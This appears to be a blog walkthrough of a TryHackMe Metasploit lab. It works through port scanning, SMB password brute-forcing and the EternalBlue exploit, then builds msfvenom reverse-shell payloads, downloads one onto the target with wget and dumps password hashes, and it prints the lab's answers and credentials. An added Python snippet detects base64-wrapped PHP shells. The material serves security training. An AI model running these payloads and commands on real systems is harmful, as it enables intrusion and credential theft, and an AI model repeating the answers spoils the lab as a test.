Metasploit: Exploitation | TryHackMe walkthrough

Bry
13 min read · Apr 10, 2024


Task 1 | Introduction

In this room we will cover:

  • How to scan target systems using Metasploit.
  • How to use the Metasploit database feature.
  • How to use Metasploit to conduct a vulnerability scan.
  • How to use Metasploit to exploit vulnerable services on target systems.
  • How msfvenom can be used to create payloads and obtain a Meterpreter session on the target system.

For these tasks we will be using a wordlist.

If you’re using the AttackBox, it can be found at the path: /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt

OR

If you’re using your own machine, download the wordlist by clicking the Download Task Files button at the top right.

Questions:

Start the AttackBox and run Metasploit using the msfconsole command to follow along with this room.

No answer needed

Task 2 | Scanning

Port Scanning

Metasploit has a few modules to scan open ports. List these scanning modules using the search portscan command.

After picking a module, use show options to see what is required to run the scan.

Example:

  • Concurrency: Number of targets to be scanned simultaneously.
  • Ports: Port range to be scanned. Note: Nmap scans the 1000 most used ports by default, while Metasploit scans ports 1 to 10,000.
  • Rhosts: Target or target network to be scanned.
  • Threads: Number of threads that will be used simultaneously. More threads result in a faster scan.

Nmap can also be used from the msfconsole prompt for a faster scan.

UDP service identification

The scanner/discovery/udp_sweep module provides a quick way to identify services running over UDP. It won’t give you full details, but it’s a good way to identify services such as DNS or NetBIOS.

SMB Scans

Metasploit has several auxiliary modules to scan specific services, SMB being one of them. The smb_enumshares and smb_version scanners are useful in corporate networks.

When performing service scans, make sure to include services like NetBIOS, which allows sharing and sending files over the network (like SMB). NetBIOS names can reveal important details about a host’s role (e.g. CORP-DC, DEVOPS, SALES). You may also run into shared files and folders that can be accessed without a password, or with a simple one.

Questions:

How many ports are open on the target?

Answer: 5

Explanation:

Performing a port scan with auxiliary/scanner/portscan/tcp is a good way to see open ports!

We can also run nmap to get a little more detail about the services running on these ports:

Using the relevant scanner, what NetBIOS name can you see?

Answer: ACME IT SUPPORT

Explanation:

Metasploit has a scanner that gives us information about the NetBIOS service running on the target: scanner/discovery/udp_sweep.

Once we select the scanner, use show options to see what parameters need to be set before we run it. It looks like RHOSTS needs to be set. The command to do this is set rhosts [target IP]. Run the scan and you’ll see the name for NetBIOS.

What is running on port 8000?

Answer: webs/1.21

Explanation:

From our nmap scan we can see that the HTTP-alt service is running on port 8000. Since it’s HTTP, we’ll use an HTTP scanner: use auxiliary/scanner/http/http_version

Now we need to know what parameters need to be set, using show options.

Set the RHOSTS with the target IP.

Make sure to change the RPORT! We have to scan port 8000; the default is 80.

After setting parameters, we can now run the scanner.

What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.

Answer: leo1234

Explanation:

We need to brute-force the password. The scanner we need to use is auxiliary/scanner/smb/smb_login.

Plug in the information we have for the parameters (show options):

  • RHOSTS: target IP
  • SMBUser: penny
  • PASS_FILE: /path/to/file/MetasploitWordlist-1632491116676.txt

Once the parameters are set, run the scanner! When the scan is complete you should see the credentials for the user like so:

Task 3 | The Metasploit Database

Metasploit has a database that simplifies project management. In a real penetration test there will be several targets under test, so avoiding confusion is important.

  • You will need to start the PostgreSQL database with the command systemctl start postgresql
  • Then you need to initialize the Metasploit database using the msfdb init command
  • Now launch msfconsole and check the database status using db_status

Workspaces:

  • The database allows you to create workspaces to isolate different projects. When first launched, you should be in the default workspace. List workspaces with the workspace command.
  • You can add a workspace with -a or delete a workspace with -d

Here we can see a workspace named “tryhackme” was created:

  • The new workspace is marked with a * symbol. To switch between workspaces, type workspace [workspace name]:
  • Workspace options can be viewed with the workspace -h command.

Once Metasploit is launched with a database, the help command will show you the Database Backends.

If you run an Nmap scan using db_nmap, all results will be saved to the database. Command: db_nmap -sV -p- [target IP]

You can now view information about hosts and the services running on them with the hosts and services commands:

Use hosts -h and services -h for available options.

Example Workflow:

  1. We will use the vulnerability scanning module that finds potential MS17-010 vulnerabilities with the use auxiliary/scanner/smb/smb_ms17_010 command.
  2. We set the RHOSTS value using hosts -R:
  3. We type show options to check that all values were assigned correctly. (In this example, 10.10.12.229 is the IP address we scanned earlier using the db_nmap command):
  4. Once all parameters are set, we launch the module using the run or exploit command.

All IP addresses in the database will be used when hosts -R is run.

In a penetration testing engagement, we could have the following scenario:

  • Finding available hosts using the db_nmap command
  • Scanning these for further vulnerabilities or open ports (using a port scanning module)

The services command used with the -s parameter will allow you to search for specific services in an environment:

Always look for low hanging fruit vulnerabilities:

  • HTTP: Hosts a web application; you may find vulnerabilities like SQL injection or remote code execution
  • FTP: Could allow anonymous login and provide access to files
  • SMB: Could be vulnerable to SMB exploits like MS17-010
  • SSH: Could have default or easy-to-guess credentials
  • RDP: Could be vulnerable to BlueKeep or allow desktop access if weak credentials are used

Metasploit has a lot of different ways to make engagements organized and to analyze data easily.

Task 4 | Vulnerability Scanning

Metasploit allows you to find critical vulnerabilities known as “low hanging fruit”. These vulnerabilities are easy to find and exploit, and could allow you to gain a foothold on a system, which can lead to root or admin privileges.

The better you are at gathering information on the target, the more vulnerabilities you’ll find using Metasploit. Without thoroughly scanning your target, Metasploit can’t help you much. For example, if you identify a VNC service running on the target, you can use the search function to list useful modules. You can use the info command (when you’re in a module) to get a better understanding of its use and purpose.

The auxiliary/scanner/vnc/vnc_login module can help us find login details for the VNC service.

Questions:

Who wrote the module that allows us to check SMTP servers for open relay?

Answer: Campbell Murray

Explanation:

First I searched for the SMTP relay module. I did this by using search smtp relay

Then I typed use 0 to open the smtp_relay module.

Using info will give us the answer:

Task 5 | Exploitation

As we know, Metasploit can be used to exploit vulnerabilities. You can search exploits with the search command and obtain information about the exploit with the info command. Once we pick what we want, we can then exploit using exploit.

Most exploits will have a default payload. To see other payloads, you can list them with show payloads:

Once you have decided on a payload, you can use the set payload command to make your choice:

Choosing a payload is trial and error; failures can be caused by firewall rules, antivirus, etc.

Remember to set parameters!

Once a session is opened, you can background it using CTRL+Z or abort it using CTRL+C. Backgrounding a session allows you to work on other things as it’s running.

Working with sessions

The sessions command will list all active sessions. To see options use the sessions -h command.

You can interact with existing sessions with the sessions -i command followed by the session ID (e.g. sessions -i 1)

Questions:

Exploit one of the critical vulnerabilities on the target VM.

No answer needed

Explanation:

Get Metasploit running with the msfconsole command, then start with an nmap scan to see what services are running on the network:

Windows 7 caught my eye; it’s an outdated Windows version.

They hinted at what exploit to use in the above reading (exploit/windows/smb/ms17_010_eternalblue).

This exploit takes advantage of SMBv1 vulnerabilities in older versions of Microsoft Windows. SMB is used to share resources and files remotely. If successful, this vulnerability can result in remote code execution on the target machine.

I searched for eternalblue in the msfconsole:

Then I typed use 0 to select that module.

Always check for required parameters with show options:

RHOSTS needs to be set to the target IP address.

The LHOST may need to be set to your local machine’s IP address.

When the parameters are set, go ahead and run the exploit with the run command.

A Meterpreter prompt should pop up if the exploit was successful.

Keep in mind you may need to run this exploit a few times before it works!

What is the content of the flag.txt file?

Answer: THM-5455554845

Explanation:

Meterpreter has a search function to look for a specific file. It’ll look like this: search -f flag.txt

Just like Linux, you can use the cat command to display the contents of a file: cat /users/jon/documents/flag.txt

What is the NTLM hash of the password of the user “pirate”?

Answer: 8ce9a3ebd1647fcc5e04025019f4b875

Explanation:

TryHackMe gives us a hint to use hashdump.

Run hashdump in the Meterpreter session:

The first set of numbers (between the two “:”) is the hash of the username, the second set is the hash for the password!

Task 6 | Msfvenom

Msfvenom allows you to generate payloads and access all payloads available in the Metasploit framework. In msfvenom, you can create payloads in different formats (PHP, exe, dll, elf, etc.) and for different target systems (Apple, Windows, Android, Linux, etc.)!

Command to view payloads: msfvenom -l payloads

Output formats

You can generate stand-alone payloads (e.g. a Windows executable for Meterpreter) or get a usable raw format (e.g. Python). List supported output formats with: msfvenom --list formats

Encoders

Encoders can be effective against antivirus on the target system by encoding the payload. Modern obfuscation techniques or shellcode injection are a better way to evade antivirus solutions.

Example: Encoding the PHP version of Meterpreter with Base64

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64

Breaking it down:

  • -p: the payload
  • LHOST: the attacking machine
  • -f: the output format
  • -e: the encoder
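The php/base64 encoder only wraps the real code in eval(base64_decode(...)), and that wrapper is exactly what a defender can unwrap. The following is an added example, not code from the room or from Metasploit: a small Python scanner that peels that wrapper off a PHP file (nested wrappers included) and reports which socket or command-execution functions the decoded code calls. The exact wrapper shape and the sample files are assumptions constructed here.

```python
import base64
import binascii
import re

# Shape of the wrapper the php/base64 encoder is assumed to emit (assumption:
# quotes may be single, double or absent, and the base64 may be line-wrapped).
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"]?)([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)

# PHP functions a decoded reverse-shell or Meterpreter stage typically relies on.
SUSPICIOUS = ("fsockopen", "socket_create", "stream_socket_client",
              "shell_exec", "passthru", "proc_open", "system(")


def decode_layers(source: str, max_depth: int = 5) -> str:
    """Peel nested eval(base64_decode(...)) wrappers; return the innermost PHP."""
    current = source
    for _ in range(max_depth):
        match = EVAL_B64.search(current)
        if not match:
            break
        blob = re.sub(r"\s+", "", match.group(2))  # drop line wrapping
        try:
            current = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            break  # not valid base64: stop and judge what we have
    return current


def scan_php(source: str) -> dict:
    """Verdict for one PHP file: base64-wrapped? which risky calls does it make?"""
    wrapped = EVAL_B64.search(source) is not None
    inner = decode_layers(source) if wrapped else source
    hits = sorted(fn for fn in SUSPICIOUS if fn in inner)
    return {"base64_wrapped": wrapped, "suspicious_calls": hits,
            "flag": wrapped and bool(hits)}


# Constructed samples (not real msfvenom output): a wrapped socket-opening stub,
# a wrapped but harmless file, and an ordinary unwrapped file.
SAMPLE_STAGER = "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(
    b"$s = fsockopen('203.0.113.5', 4444);").decode()
SAMPLE_BENIGN = "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(
    b"echo 'hello';").decode()
SAMPLE_PLAIN = "<?php echo 'hello'; ?>"

if __name__ == "__main__":
    for name, php in (("stager", SAMPLE_STAGER), ("benign", SAMPLE_BENIGN), ("plain", SAMPLE_PLAIN)):
        print(name, scan_php(php))
```

Only the stager sample is flagged: base64 wrapping alone is not evidence, but wrapping combined with a socket call is worth a closer look in a web-root scan.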

Handlers

Handlers accept incoming connections generated by the MSFvenom payload, which means catching a shell. When using an exploit module, this part is automatically handled by the exploit module. Reverse shells or Meterpreter callbacks generated in your MSFvenom payload can be caught using a handler.

Other Payloads

MSFvenom can be used to create payloads in almost all formats, depending on the target system’s configuration.

In these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen.

Linux Executable and Linkable format (elf):

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=xxxx -f elf > rev_shell.elf

The .elf format is the executable file format for Linux, like .exe is for Windows. You may need to make sure the file has executable permissions on the target machine. For example, once you have shell.elf on the target machine, use the chmod +x shell.elf command to grant executable permissions. Once done, run the file by typing ./shell.elf on the target machine’s command line.

Windows:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=XXXX -f exe > rev_shell.exe

PHP:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=XXXX -f raw > rev_shell.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=XXXX -f asp > rev_shell.asp

Python:

msfvenom -p cmd/meterpreter/reverse_python LHOST=10.10.x.x LPORT=XXXX -f raw > rev_shell.py

All of the examples above are reverse payloads. You will need to have the exploit/multi/handler module listening on your attacking machine to work as the handler. Set up the handler with the payload, LHOST and LPORT parameters. These values will be the same you have used when creating the msfvenom payload.

Questions:

Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type “sudo su” to get a root shell; this will make things easier.

No answer needed

Explanation:

I connected via SSH from my Kali machine!

The command to do this is ssh username@targetIP

It’ll give a prompt asking if you want to connect; type yes, then hit enter. You will then have to enter the password “1q2w3e4r”. Nothing will show up as you’re typing.

Boom, you successfully connected.

Type “sudo su” to get a root shell.

Let’s continue!

Create a Meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).

No answer needed

Explanation:

Creating a Meterpreter payload is done in your attacking machine’s terminal.

They give us the payload we’re supposed to use in the reading. The payload: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=7777 -f elf > rev_shell.elf

Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://attacking_machine_IP:9000/shell.elf to download it to the target machine).

No answer needed

Explanation:

First, start a Python web server on your attacking machine with python3 -m http.server 9000

Then, download the payload to your target machine using the command wget http://attacking_machine_IP:9000/rev_shell.elf

Once it’s transferred to the target system, we need to make this payload executable with the chmod +x rev_shell.elf command.

Get a Meterpreter session on the target machine.

No answer needed

Explanation:

Open up a new terminal on your attacking machine and start Metasploit with msfconsole.

You will need to have the exploit/multi/handler module listening on your attacking machine to work as the handler (to catch the shell).

To see required parameters, we’ll use “show options”. We’ll need to set the payload, LHOST and LPORT.

Setting parameters:

Remember the payload we created in msfvenom? Make sure to set that parameter or the handler won’t connect! Like so:

After you get the handler set up on your local machine, type run and then head over to the target’s terminal.

Run the file with: ./rev_shell.elf

A Meterpreter session should be created if the shell was successful! (It appears in the terminal where you ran msfconsole; nothing should happen in the target’s terminal, it should just hang.)

Use a post exploitation module to dump hashes of other users on the system.

No answer needed

Explanation:

Hashdump dumps all the user hashes. Use the post/linux/gather/hashdump module.

What is the other user’s password hash?

Answer: $6$SyONNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXDWtcQd8rfOtjc77hBFbWx jGmQCTbep0

Task 7 | Summary

Metasploit can help you identify and exploit vulnerabilities on target systems.

You have also seen how the database feature can help when you have multiple targets in a penetration test. Finally, you have gained experience creating standalone Meterpreter payloads with msfvenom. This is helpful in situations where you can upload a file to the target system or have the ability to download files to the target system. Meterpreter is a powerful tool that offers easy to use features during the post exploitation phase.

Questions:

No answer needed
